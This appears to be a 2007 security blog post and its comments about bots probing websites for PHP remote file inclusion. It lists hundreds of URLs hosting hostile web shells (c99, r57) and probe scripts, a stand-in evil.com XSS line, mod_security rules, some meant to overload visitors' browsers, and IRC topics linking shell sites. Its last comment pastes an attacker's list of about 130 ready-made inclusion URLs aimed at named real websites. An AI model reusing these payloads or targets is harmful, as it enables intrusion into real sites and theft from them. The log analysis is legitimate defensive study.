PHP Include Robots
I’ve been toying around quite a bit with robots who attempt to exploit the site in various ways. I’ve been seeing an interesting shift in robots that are moving away from direct exploitation until they detect that it is exploitable. That is interesting because it’s reducing the risk of someone just connecting to the script, downloading it and connecting to the controlling IRC servers. Here’s the list I got in today’s log file (please use extreme caution when viewing these - they are intentionally hostile in unknown ways):
http://2zero.by.ru/bot/echo.txt
http://38.99.89.50/.r/echo.txt
http://38.99.89.50/echo.txt
http://59.25.189.83/~upload/tt
http://66.235.205.131/echo
http://72.29.94.218/scr/evl.txt
http://80.86.105.122/echo.txt
http://afcomdfw.org/echo
http://albapower.de/id.txt
http://aldy.deep-ice.com/99.txt
http://aldy.deep-ice.com/mitra/echo.txt
http://aldy.ifastnet.com/xpl/echo.txt
http://alienr0x.by.ru/.spreag.txt
http://alienr0x.by.ru/r57.txt
http://andravarldar.se/cmd
http://arva.medusanetwork.com/echo.txt
http://az.co.cz/foto/c9.txt
http://b4ngs4t.com/echo
http://bacaplume.free.fr/manager/frontinc/services.txt
http://bavatuesdays.com//wp-content/plugins/wordtube/n00gr00d.txt
http://bb.domaindlx.com/armee/x.txt
http://br.geocities.com/darkteam4ever/echo.txt
http://br.geocities.com/porfook/engine.txt
http://bristoloakpaintballclub.com/calendar/calendar/includes/js/.,/.,/.,/test.txt
http://buceta.789mb.com/cmd1.txt
http://busca.uol.com.br/uol/index.html
http://bwlist.altervista.org/stringa.txt
http://chireo.info/n00gr00d.txt
http://clubmusic.caucasus.net/f22.txt
http://cmdfile.ifastnet.com/cmd/57.txt
http://cmdfile.ifastnet.com/cmd/a.txt
http://coccor0x.altervista.org/response.txt
http://d3prive.my-place.us/id.txt
http://d4rk4ir.altervista.org/r57.txt
http://dandorohoi.0catch.com/.r/echo.txt
http://deporpasto.com/portal/components/com_smo_ajax_shoutbox/languages/cmd.do
http://detroit.my-php.net/id.txt
http://dezzign.ru/echo
http://diving.actionpro.cz/galerie/tmp/vob.txt
http://dj.eliteradio.info/ech21o.txt
http://dj.eliteradio.info/echo.txt
http://drxrwx.ifastnet.com/57.txt
http://drxrwx.ifastnet.com/a.txt
http://dvl.by.ru/cmd/r57shell.txt
http://ebrain.netfast.org/r57
http://efardella.cinet.it/claroline/phpbb/id.txt
http://emi.faccat.br/coisasdowindovaio/freeman.txt
http://empore.altervista.org/rox.txt
http://equipexapadao.com/echo
http://faillurecorp.iespana.es/evals.txt
http://faillurecorp.iespana.es/id.txt
http://for-a.co.in/vulgar.htm
http://founder-poltekcrews-allnetwork.org/echo
http://freewebs.com/celinho/id.txt
http://freewebs.com/sak4w/r57.txt
http://geocities.com/surabayateam/vulgar.gif
http://gnuworld.evolink.ro/xxx/3739.echo.txt
http://h1.ripway.com/eownz/id.txt
http://h1.ripway.com/h4ck/echo.txt
http://h1.ripway.com/overcashxd/echo
http://h1.ripway.com/thc/id.txt
http://hacker.to.md/Qe3
http://hacker.to.md/mesin
http://hacker.to.md/x
http://happy.altervista.org/name.txt
http://heidik.org/y/id.txt
http://heritagelost.net/phpraid/cmd.txt
http://hokkian.dalnetz.biz/cibe.txt
http://ht-o.de/hto/images/echo
http://ikhlas.com.my/57.txt
http://ikhlas.com.my/cmd.txt
http://int0xic.by.ru/id.txt
http://jargo.phpnet.us/ilkom.txt
http://k52.jp/echo
http://kaoru-t.com/cache/echo.txt
http://kretenovich.phpnet.us/cmd.gif
http://l3to.by.ru/id.txt
http://lamerma.com.ve/n00gr00d.txt
http://lifechangerscc.com//catalog/includes/asd.txt
http://lifechangerscc.com//catalog/includes/cmd.txt
http://lppm.uns.ac.id/r57.txt
http://luis.infopiera.com/evl.txt
http://mabiographie.fr/httaccess
http://maxdemon.1sthost.org/docs/robot.txt
http://members.lycos.co.uk/modelteam/echo.txt
http://mensagem.us/hack/echo
http://multiplex.netfast.org/stringa.txt
http://nainty.xlphp.net/c99.txt
http://napushenko.phpnet.us/evl.txt
http://nemecsek87.altervista.org/ciao.jpg
http://netbarg.com/admin/backups/id.txt
http://new.bacone.edu/mambo/help.txt
http://niigatakubota.co.jp/.defacer/.secret/echo
http://nikkeydetetives.com/over/echo
http://nocommercial.altervista.org/my/nc.txt
http://norman.webspacemania.com/id.txt
http://norman.webspacemania.com/r57.txt
http://nosaj.1sweethost.com/freeman.txt
http://nxlf.cn/1
http://offzinho.netfast.org/57
http://openl4b.altervista.org/CMD.txt
http://partyaccess.net/2007/components/com_extcalendar/echo
http://pasto.com/administrator/components/safe.txt
http://perdu.ch/cgi-bin/echo
http://portal.isara.fr/claro151grain/claroline/auth/ldap/…bl/…/stringa.txt
http://priv8.netfast.org/cmd/r57.gif
http://putogame.webspacemania.com/r57.txt
http://putogame.webspacemania.com/safe.txt
http://raz0r-sh4rks.org/id.txt
http://redza.t35.com/xpl/injek
http://reshack.ifastnet.com/xpl/xpl.txt
http://rizla2.interfree.it/p.txt
http://rootkay.by.ru/id.txt
http://rotaryclub-fulham.org//components/com_extcalendar/cmd.txt
http://rpgnet.com/images/m4f14d3c4lc1nh4.txt
http://sanwall.info/echo.txt
http://scan.prohosts.org/echo.txt
http://serc.ilc.edu.tw/echo
http://site.netspace.pt/media/echo.php
http://sniffo.by.ru/SuPrEmO.txt
http://stip-city.org/evl.txt
http://suntikan.org/echo
http://sup3rskunk.interfree.it/c99.txt
http://sup3rskunk.interfree.it/o.txt
http://symboliclynx.com/images/a
http://tauzendmark.ro/.r/echo.txt
http://thebadfox.jeeran.com/c99.txt
http://thedivaslist.com/.r/echo.txt
http://thelostsummer.com/x.do
http://theoriginalista.altervista.org/unix/no.txt
http://topnlpsites.com/images/gif/echo.txt
http://tosa.altervista.org/stringa.txt
http://treo.palmtop.pl/klub/Cmd.txt
http://ulil.xlphp.net/msn/msn
http://va7in.phpnet.us/vhv
http://valdhano.phpnet.us/gfs
http://valdhano.phpnet.us/vhv
http://varmvaffel.no-ip.com/andy/c99.txt
http://vcsok.com/echo
http://vegeta.co.jp/echo
http://vh1.srt.com.cn/sewam/c99.txt
http://waou.altervista.org/r57.txt
http://woodshack.com/components/com_phpshop/shop_image/help/freeman.txt
http://www.247live7.com/diablocrew/cmd.txt
http://www.Leonard0.kit.net/echo.txt
http://www.activekitten.com//bitrix/updates/ciola.txt
http://www.apnic.net/index.html
http://www.article-website.co.uk/admin/backup/RipperzCrewz
http://www.asqbuffalo.org/backups/freeman.txt
http://www.bastardirc.net/scan5.txt
http://www.bewahrer-azeroth.de/phpraid//raid_lua/asd.txt
http://www.chv.ro/cache/0day
http://www.defi.isep.ipp.pt/~jaa/cache/a
http://www.dgsport.be/components/res.txt
http://www.eclypse.info/oche
http://www.ekin0x.com/r57.txt
http://www.equipexapadao.com//id.txt
http://www.equipexapadao.com/echo
http://www.equipexapadao.com/id.txt
http://www.esto.sky7.us/RipperzCrewz
http://www.esto.sky7.us/SECRET.c
http://www.facepi.com.br/cache/…/botnet/out2.txt
http://www.fena.nu//components/com_rsgallery/r57rex.txt
http://www.freewebs.com/alezinn/n00gr00d.txt
http://www.geocities.com/junlee_180/metro/yeyen.txt
http://www.geocities.com/kampusunika/lamercrew.txt
http://www.geocities.com/kharisma_usada_mustika/checkit.txt
http://www.gonfiabiligamespark.it/flash/r57.txt
http://www.gritservice.it/r57.txt
http://www.hanovercova.us/business/x.txt
http://www.himagara-unila.com/x.do
http://www.k1ll3rx.addr.com/id.txt
http://www.kebcomputer.com/cache/error.txt
http://www.kebcomputer.com/cache/tess.txt
http://www.kebcomputer.com/cache/tests.txt
http://www.kelserific.xpg.com.br/tool25.txt
http://www.kendera.com.br/mvk.txt
http://www.leonard0.kit.net/echo.txt
http://www.modulardepot.com/smallimages/help/freeman.txt
http://www.mvmedia.com/old/Cmd.txt
http://www.mydezent.de/dload/pdl-gfx/ciola.txt
http://www.panglimacollection.com/titid.gif
http://www.panglimacollection.com/titid.txt
http://www.phazethree.com/shoponline/images/CMD.txt
http://www.pic4.us/pic/wvj89367.gif
http://www.private-scan.kit.net/evl.txt
http://www.pronext.eu/help/a.txt
http://www.propgpq.uece.br/mdb/echo
http://www.raaness.no/a
http://www.rhino-invest.info/FIP/id.txt
http://www.rpgnet.com/images/m4f14d3c4lc1nh4.txt
http://www.stockgoeroe.com/main.txt
http://www.subway56.com/delivery/modules/maindisplay/id.txt
http://www.sunshinefalls.com/Templates/.m/string.jpg
http://www.t5kclan.com/echo
http://www.tarcisiobr.kit.net/echo.txt
http://www.telecom.conexlink.com/includes/cache_tpls/freeman.txt
http://www.the-esao.com/imag/stringa.txt
http://www.thedivaslist.com/.r/echo.txt
http://www.thegrumbleweeds.com/pubgal/freeman.txt
http://www.thelostsummer.com/x.do
http://www.thiaguinho.net/id.txt
http://www.trendsturm.de/catalog/includes/help/freeman.txt
http://www.triton.xpg.com.br/biscate.txt
http://www.ugurfotograf.com/resources/incoming/a.txt
http://www.velozbr.netfast.org/Cmd/r57.txt
http://www.vortex2.altervista.org/cmd.txt
http://www.wantme.ca/cache/.,/.,/.,/test.txt
http://www.webbmakaren.se/test/admin/img/help/cmd.txt
http://www.webbmakaren.se/test/admin/img/help/freeman.txt
http://www.wow-insomnia.com/images/cmd.txt
http://www.yotasurf.co.uk/coppermine/albums/CMD.TXT
http://www.yufa.spb.ru/modules/coppermine/include/main.txt
http://www1.greenpeace.org.hk/camp/id.txt
http://xmlstuff.ifastnet.com/cmd/cmdx.do
http://xoomer.alice.it/hackz/ahah/no.php
http://xoomer.alice.it/marian0zx/ahah/no.php
http://xoomer.alice.it/marian0zx/ahah/solo.php
http://xoomer.alice.it/uploadftp/r57rex.txt
http://xpl46.altervista.org/config.txt
http://xpls.my-place.us/own.txt
http://younes.by.ru/c99.txt
You’ll notice an awful lot of “echo” versions which (when still valid) return content like:
<? echo "1122548"; ?>
Apparently others have seen this as well so it’s not just me. This is a shift in tactics that will no doubt have a big impact on the survivability of bot-nets as they will be more difficult to detect. The only problem is that the numbers don’t appear to be dynamic. It won’t take long to correct that, which will mean that seeing what the bots are doing will require honeypots. It’ll be interesting to see the bots evolve over time.
June 11th, 2007 at 10:04 pm
I find a couple hundred attempts to load c99 PHP shells each and every day rifling through my domain logs. Usually they are in the form of a text file, or image, but in some cases the file does not even exist. It’s still a pain in the ass though.
June 12th, 2007 at 12:18 am
Here’s an interesting proposal:
If the bots submit a file which looks like this:
<? echo “<script src=’http://evil.com/xss.js’></script>”; ?>
What do you do?
If you echo the content back, then you’ve just created yourself an XSS hole, but if you don’t echo it back, then you can’t find what the bot is doing.
And there is no way to emulate that kind of response without giving it so unlike a payload which checks databases or reads files, you have to let it do some damage.
June 12th, 2007 at 6:20 pm
I see these in my log constantly. What I’ve been noticing more of are bots that are using HTTP REFERRERS from my own site. E.g. this was a pesky little thing for a minute until I blocked it with mod_security and a chain. An easy way with mod security is something like this which I’ve tested and currently implemented in the last 36 hours…
# Anyone coming in… Check them
SecFilterSelective REQUEST_URI “/index.php” chain
# If they’re injecting any http string redirect them…
SecFilterSelective REQUEST_URI “.*http://*” redirect:http://www.infiltrated.net/sorry.jpg
# Anyone circumventing garbage… redirect them too but send their PC into memory overload
SecFilterSelective REQUEST_URI “.*amp;do” redirect:http://www.infiltrated.net/stupidIE.html
# Anyone visiting this site… I didn’t refer you… If you want to pretend like I did… You too can get das boot and have your machine overloaded…
SecFilterSelective REQUEST_URI “.*item=35″ chain
SecFilterSelective HTTP_REFERER “http://www.infiltrated.net/index.php?id=news&do=2&item=35″ redirect:http://www.infiltrated.net/stupidIE.html
Now I noticed after these rules were in place, there were a few hosts trying to shift things around so I played with them until I got bored and created the mod_security+htaccess+personal_script to auto ipf em from connecting for a week…
Sup zeno and rs (if you read this) … sil
June 13th, 2007 at 6:09 am
ugh, check out irc.gigachat.net:6667 - referenced in a few of these php bots.
it’s NOTHING BUT .br ddos kiddies…
most popular channel is #DDOS :
* Topic is ‘#DDOs Amigos, SCAN’s Tudo aqui =] Quer Registros? Conquiste! CMD –> http://vnc2007.netfast.org/tr57.txt? / Mudanas estao para acontecer e novidades tambm..! http://www.milw0rm.com/author/53′
* Now talking in #aod
* Topic is ‘Angels of Death team: Neogenik - bapoz - mephisto - Darkrevenge | Xpl1: http://www.injek.cc/xpl/ | Xpl2: http://www.adek.org/xpl/ |cmd: http://andravarldar.se/cmd? | BotScan: http://AoD.tiagow.us/botscan.txt |News: DarkRevenge coding CMD for Sony PSP’
* Now talking in #wWw.cOm
* Topic is ‘CMD = http://cmdfile.ifastnet.com/cmd/a.txt? | XPL = http://www.adek.org/xpl/ - (@Scan)(Online) - Type - !scan | Don’t flood bot ! ‘
and so on, and so on….
*sigh*
June 13th, 2007 at 7:04 am
Addendum:
From a channel topic: http://www.xshqiptaretx.org/SHELLZ.txt
#*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
#WELCOME TO - ALBANIA.SECURITY.CLAN-
#
#PUBLIC VULNERABILLITY COLLECTION BY:
#
#”~A.S.C TEAM~”: Mafia_Boy, Anonymous, CoNtRoLLeR, A^L^B^A^N^I^A^^, NiNja, r0Y, W0rLD, MaSteR, Zetha, Zap, JaheeM!!!
#
#ENJOY - HAVE FUNN
#
#*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
#VuLNeRaBiLiTY SHELLZ By ALBANIA.SECURITY.CLAN STAFF @ IRC.FIER1.COM - IRC.UNIXHELL.COM - IRC.FIERICLAN.NET ) #
#*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
THE BEST WORLD OF A NEW STYLE OF LIFE 100% PUR ILLEGAL SHAKING
http://www.cenip.com.ar/demo/cenip/index.php?W=http://az.co.cz/foto/c9.txt?
http://www.stlofficespace.com/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.ldp.nu/Index2.php?page=http://az.co.cz/foto/c9.txt?
http://www.igaci.com.ar/main.php?id=http://az.co.cz/foto/c9.txt?
http://www.scubacat.nl/index.php?pagina=http://az.co.cz/foto/c9.txt?
http://www.smigroup.it/service/reserved/home.php?page=http://az.co.cz/foto/c9.txt?
http://www.mtssro.cz/joomla/administrator/components/com_remository/admin.remository.phpmosConfig_absolute_path=http://az.co.cz/foto/c9.txt?
http://www.cantorelli.com/Services.php?dest=http://az.co.cz/foto/c9.txt?
http://www.arabischfueralle.de/index.php?action=http://az.co.cz/foto/c9.txt?
http://www.alleanzanazionaleroccasecca.it/giornale/directory/moduli/index.php?moduleName=http://az.co.cz/foto/c9.txt?
http://www.beathovens.de/main.php?dat=http://az.co.cz/foto/c9.txt?
http://www.bacultural.com/fr/home.php?module=http://az.co.cz/foto/c9.txt?
http://www2.rcenter.com.br/index2.php?idpx=http://az.co.cz/foto/c9.txt?
http://www.ixoxrwma.gr/index.php?lang=http://az.co.cz/foto/c9.txt?
http://www.nipponnews.net/contact.php?ln=http://az.co.cz/foto/c9.txt?
http://www.spoma.com/index.php?stranka=http://az.co.cz/foto/c9.txt?
http://www.acquistoonline.org/main.php?pag=http://az.co.cz/foto/c9.txt?
http://www.fausernet.novara.it/~itisleon/2005/indice.php?link=http://az.co.cz/foto/c9.txt?
http://www.dce.ufc.br/pagina.php?arquivo=http://az.co.cz/foto/c9.txt?
http://www.maber.co.kr/main.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.holoscapital.com.ar/home.php?seccion=http://az.co.cz/foto/c9.txt?
http://www.dntar.ro/index.php?location=http://az.co.cz/foto/c9.txt?
http://www.impulsa.info/home.php?seccion=http://az.co.cz/foto/c9.txt?
http://www.oratv.org/show.php?page=http://az.co.cz/foto/c9.txt?
http://www.kvazar.com.ua/main.php?p=http://az.co.cz/foto/c9.txt?
http://www.svtharde5.nl/index.php?&item=http://az.co.cz/foto/c9.txt?
http://www.mohtagin.net/script/greats/index.php?get=http://az.co.cz/foto/c9.txt?
http://www.buffetcenter.com.br/principal/principal.php?principal=http://az.co.cz/foto/c9.txt?
http://www.roseimoveis.com.br/internas.php?modo=http://az.co.cz/foto/c9.txt?
http://www.marasport.ca/main.php/main.php?section=http://az.co.cz/foto/c9.txt?
http://www.feneo.com/links/info.php?page=http://az.co.cz/foto/c9.txt?
http://www.northtrading.com.ar/spa/index.php?pag=http://az.co.cz/foto/c9.txt?
http://www.sma.df.gob.mx/educambiental/index.php?op=http://az.co.cz/foto/c9.txt?
http://www.laopinionhgo.com/index.php?pagina=http://az.co.cz/foto/c9.txt?
http://www.meupixel.com/index.php?secao=http://az.co.cz/foto/c9.txt?
http://www.hlm2u.biz/main.php?p=http://az.co.cz/foto/c9.txt?
http://www.proteg.net/index.php?l1=http://az.co.cz/foto/c9.txt?
http://www.newstalk650.com/yourcityyourvote/index.php?right=http://az.co.cz/foto/c9.txt?
http://www.informaticasim.net/base.php?id=http://az.co.cz/foto/c9.txt?
http://www.robertbue.net/index.php?side=http://az.co.cz/foto/c9.txt?
http://www.holistic.com.br/daniel/index.php?pg=http://az.co.cz/foto/c9.txt?
http://www.stormspear.com/start.php?page=http://az.co.cz/foto/c9.txt?
http://www.interights.org/page.php?dir=http://az.co.cz/foto/c9.txt?
http://www.jhchemi.co.kr/main.php?goFile=http://az.co.cz/foto/c9.txt?
http://carnauba.cpamn.embrapa.br/qasap/index.php?id=http://az.co.cz/foto/c9.txt?
http://www.prudenmax.com.br/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.powerrex.com/shop.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.granada.sk/tangoklub/index.php?content=http://az.co.cz/foto/c9.txt?
http://www.urbanainmobiliaria.com.ar/pagina.php?medio=http://az.co.cz/foto/c9.txt?
http://www.membran.net/db_php_eng/index.php?action=http://az.co.cz/foto/c9.txt?
http://www.damianbenetucci.com.ar/damian/photo.php?section=http://az.co.cz/foto/c9.txt?
http://www.powerrex.com/shop.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.granada.sk/tangoklub/index.php?content=http://az.co.cz/foto/c9.txt?
http://www.urbanainmobiliaria.com.ar/pagina.php?medio=http://az.co.cz/foto/c9.txt?
http://www.membran.net/db_php_eng/index.php?action=http://az.co.cz/foto/c9.txt?
http://www.damianbenetucci.com.ar/damian/photo.php?section=http://az.co.cz/foto/c9.txt?
http://www.spyro.info/sumo/main.php?section=http://az.co.cz/foto/c9.txt?
http://www.actiu.com/new05/home/home.php?pagina=http://az.co.cz/foto/c9.txt?
http://www.alhourriah.org/print.php?page=http://az.co.cz/foto/c9.txt?
http://www.beeethoven.de/index.php?site=http://az.co.cz/foto/c9.txt?
http://www.ammin.uniss.it/nucleodivalutazione/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.oleriny.cz/info.php?co=http://az.co.cz/foto/c9.txt?
http://www.aerospool.sk/no100/index.php?str=http://az.co.cz/foto/c9.txt?
http://www.vanherkkaas.nl/shop.php?middle=http://az.co.cz/foto/c9.txt?
http://www.bgteam.co.kr/bbs_free.php?page=http://az.co.cz/foto/c9.txt?
http://www.saudeclass.com.br/default.php?lnk=http://az.co.cz/foto/c9.txt?
http://www.vodnanskaryba.eu/www/index.php?middle=http://az.co.cz/foto/c9.txt?
http://www.lyshaus.com/index.php?pag=http://az.co.cz/foto/c9.txt?
http://www.gginsam.com/shop.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.gobest.idv.tw/index.php3F/archives/38SQLSERVER.html=http://az.co.cz/foto/c9.txt?
http://www.todopescajunin.com.ar/index.php?seccion=http://az.co.cz/foto/c9.txt?
http://www.filharmonia.zabrze.pl/page.php?id=http://az.co.cz/foto/c9.txt?
http://www.toolscope.com/main.php?section=http://az.co.cz/foto/c9.txt?
http://www.wilka.pl/main.php?s=http://az.co.cz/foto/c9.txt?
http://www.ccpc.org.ve/home.php?seccion=http://az.co.cz/foto/c9.txt?
http://www.eminemlounge.com/index.php?id=http://az.co.cz/foto/c9.txt?
http://www.jak.netonline.ch/index.php?main=http://az.co.cz/foto/c9.txt?
http://www.cevolved.com/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.tecnicaweb.es/contenido.php?a=http://az.co.cz/foto/c9.txt?
http://www.hchheren9.nl/index2.php?phppage=http://az.co.cz/foto/c9.txt?
http://www.rgarden.com/vitalize/index.php?showpage=http://az.co.cz/foto/c9.txt?
http://www.shoto.nl/ko/layout.php?page=http://az.co.cz/foto/c9.txt?
http://www.lingera.ch/index.php?id=http://az.co.cz/foto/c9.txt?
http://www.rydebacksrf.se/www/live.php?action=http://az.co.cz/foto/c9.txt?
http://www.inverigohotel.it/main.php?pagina=http://az.co.cz/foto/c9.txt?
http://www.mimmediaevent.nl/php/template.php?showPage=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.maureensherbondy.com/index.php?url=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.sager1.de/sebastian/index.php?site=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.jonshpk.com/shqip.php?kat=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.globosaude.com.br/index1.php?pagina=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.vein.hu/www/intezetek/fdsz/szak_szerv/ulesek/generate.php?ev=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.satelliterecords.com/live/index.php?dept=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.unipanamericana.edu.co/index.php?pag=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
http://www.eurooknattk.cz/nove/ne/index1.php?adresa=http://az.co.cz/foto/c9.txt?
http://www.3i5i.de/blank.php?path=http://az.co.cz/foto/c9.txt?
http://www.tronix.nl/print.php?pagina=http://az.co.cz/foto/c9.txt?
http://www.vein.hu/www/intezetek/koz_tan/test_ulesek/generate.php?ev=http://az.co.cz/foto/c9.txt?
http://www.readaboutstuff.com/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.goldmarket.ro/ro/start.php?pag=http://az.co.cz/foto/c9.txt?
http://www.paulinazamora.com/home.php?seccion=http://az.co.cz/foto/c9.txt?
http://www.weblampjes.nl/weblampjes/lamp/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.allantiquity.com/index.php?page2=http://az.co.cz/foto/c9.txt?
http://www.imspeople.net/index.php?pag=http://az.co.cz/foto/c9.txt?
http://www.valenza.it/index.php?pag=http://az.co.cz/foto/c9.txt?
http://www.entertainmenthardware.com/Rentals/main.php?script=http://az.co.cz/foto/c9.txt?
http://www.gerryweberag.de/investorrelations.php?lang=http://az.co.cz/foto/c9.txt?
http://www.theimagecians.com/ara/index_ar.php?page=http://az.co.cz/foto/c9.txt?
http://www.ablopesukarhu.com/main.php?sivu=http://az.co.cz/foto/c9.txt?
http://www.achplv.sk/index.php?str=http://az.co.cz/foto/c9.txt?
http://www.idrate.net/index.php?goto=http://az.co.cz/foto/c9.txt?
http://www.helenandthepoorboys.de/galerien/show.php?galnr=http://az.co.cz/foto/c9.txt?
http://www.ezindus.com/main.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.jungo8949.co.kr/shop.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.italyum.com/recipes/recipe.php?recipe=http://az.co.cz/foto/c9.txt?
http://www.fillattice.com/modello_blue.php?file=http://az.co.cz/foto/c9.txt?
http://www.offisolution.co.kr/shop.php?goFile=http://az.co.cz/foto/c9.txt?
http://www.gbinline.org.uk/index.php?left=http://az.co.cz/foto/c9.txt?
http://www.rocknation.dk/?mainpage=http://az.co.cz/foto/c9.txt?
http://www.afterimagemedia.net/template.php?x=http://az.co.cz/foto/c9.txt?
http://www.karko.de/index2.php?page=http://az.co.cz/foto/c9.txt?
http://www.presbyconstruction.com/page.php?id=http://az.co.cz/foto/c9.txt?
http://www.transpress.bg/insidede.php?cont=http://az.co.cz/foto/c9.txt?
http://www.orthototaal.nl/template.php?template=http://az.co.cz/foto/c9.txt?
http://www.termodom.com.ua/index1.php?cur_page=http://az.co.cz/foto/c9.txt?
http://www.gylleneskor.se/interview/interview_prev.php?display=http://az.co.cz/foto/c9.txt?
http://www.mchead.net/portfolio.php?port=http://az.co.cz/foto/c9.txt?
http://www.francadibenedetto.com/index.php?page=http://az.co.cz/foto/c9.txt?
http://www.kubestahl.de/index2.php?language=http://az.co.cz/foto/c9.txt?
http://www.linz24.at/index.php?site=http://az.co.cz/foto/c9.txt?
http://www.chuvavasco.com/main.php?header=http://az.co.cz/foto/c9.txt?
http://www.blogs.com.br/dicas/index.php?id=http://az.co.cz/foto/c9.txt?
http://www.nordinbatik.com/main2.php?p=http://az.co.cz/foto/c9.txt?
http://www.lndnoticias.com.ar/html/modules/My_eGallery/public/displayCategory.php?basepath=http://az.co.cz/foto/c9.txt?
http://www.enneciesse.com/Sum/index2.php?var=http://az.co.cz/foto/c9.txt?
http://www.city-hunter.it/tamburi/index2.php?cont=http://az.co.cz/foto/c9.txt?
http://www.ascherslebener.de/index2.php?inhalt=http://az.co.cz/foto/c9.txt?%00
http://singmitsommer.de/index2.php?inhalt=http://az.co.cz/foto/c9.txt?=%00
http://www.ascherslebener.de/index2.php?inhalt=http://az.co.cz/foto/c9.txt?=%00&eintrag_start=0
http://www.bg-sektion-harz.de/index2.php?inhalt=http://az.co.cz/foto/c9.txt?=%00
http://www.partyandmore.net/index2.php?action=http://az.co.cz/foto/c9.txt?=%00
http://www.performance-analysis.com/index2.php?action=http://az.co.cz/foto/c9.txt?=%00
http://www.kennerly.com/fineart/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.mohiulislam.com/index2.php?page=text/history.php&rlink=http://az.co.cz/foto/c9.txt?=%00&rpic=rlink/rpic_history.php
http://www.mohiulislam.com/index2.php?page=text/history.php&rlink=rlink/rlink_profile.php&rpic=http://az.co.cz/foto/c9.txt?=%00
http://www.dynamicssoftware.com/index2.php?page=Home%20page&sub=http://az.co.cz/foto/c9.txt?=%00&content=13
http://www.dynamicssoftware.com/index2.php?page=Home%20page&sub=http://az.co.cz/foto/c9.txt?=%00&content=12
http://www.davidkennerly.com/fineart/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.godwinbooks.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.abbotthillramblers.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://pacelighting.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://mbenazet2.free.fr/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.irctrials.com/sponsors/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.harmaraccess.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.ohioschoolplan.org/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.orbitedu.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00&name=Sunday%20Test
http://www.andrubemis.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
http://www.chestnutgrove.wandsworth.sch.uk/index2.php?page=http://az.co.cz/foto/c9.txt?=%00&name=Admissions
http://www.royvervoort.nl/vieux-sarrazac/index2.php?language=nl&content=http://az.co.cz/foto/c9.txt?=%00&SubMenu=0
http://www.klidapohoda.cz/index2.php?x=http://az.co.cz/foto/c9.txt?=%00
http://absolute-destiny.net/music/index2.php?x=http://az.co.cz/foto/c9.txt?=%00
http://sc.absolute-destiny.net/index2.php?x=http://az.co.cz/foto/c9.txt?=%00
http://www.infocentrum.opava.cz/index2.php?file=http://az.co.cz/foto/c9.txt?=%00&menu=4
http://www.intensecaraudio.net/index2.php?site=http://az.co.cz/foto/c9.txt?=%00
http://www.pmd-webdesign.de/gfxroom2/index2.php?site=http://az.co.cz/foto/c9.txt?=%00&i=0
http://www.monnerecher-musek.net/index2.php?site=http://az.co.cz/foto/c9.txt?=%00
http://www.schulen.li/rss/schulseite/index2.php?site=http://az.co.cz/foto/c9.txt?=%00
http://www.neptun-club.com.ua/index2.php?dir=http://az.co.cz/foto/c9.txt?=%00
http://www.dorisankarberg.se/index2.php?dir=http://az.co.cz/foto/c9.txt?=%00
http://nagelstudio-overberg.de/index2.php?dat=http://az.co.cz/foto/c9.txt?=%00
http://www.gemeinde-gerwisch.de/index2.php?link=http://az.co.cz/foto/c9.txt?=%00
http://www.consultyou.ch/index2.php?link=http://az.co.cz/foto/c9.txt?=%00&link2=About%20us
http://www.galaentertainment.se/index2.php?link=http://az.co.cz/foto/c9.txt?=%00
([if That CMD Doen’t Work Wuse This:=> rocksv.com/c99.txt? az.co.cz/foto/c9.txt? phpshell.mackatack.com/source.txt? andravarldar.se/cmd? http://vh1.srt.com.cn/sewam/c99.txt? ])
#*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
#VuLNeRaBiLiTY SHELLZ By ALBANIA.SECURITY.CLAN STAFF @ IRC.FIER1.COM - IRC.UNIXHELL.COM - IRC.FIERICLAN.NET ) #
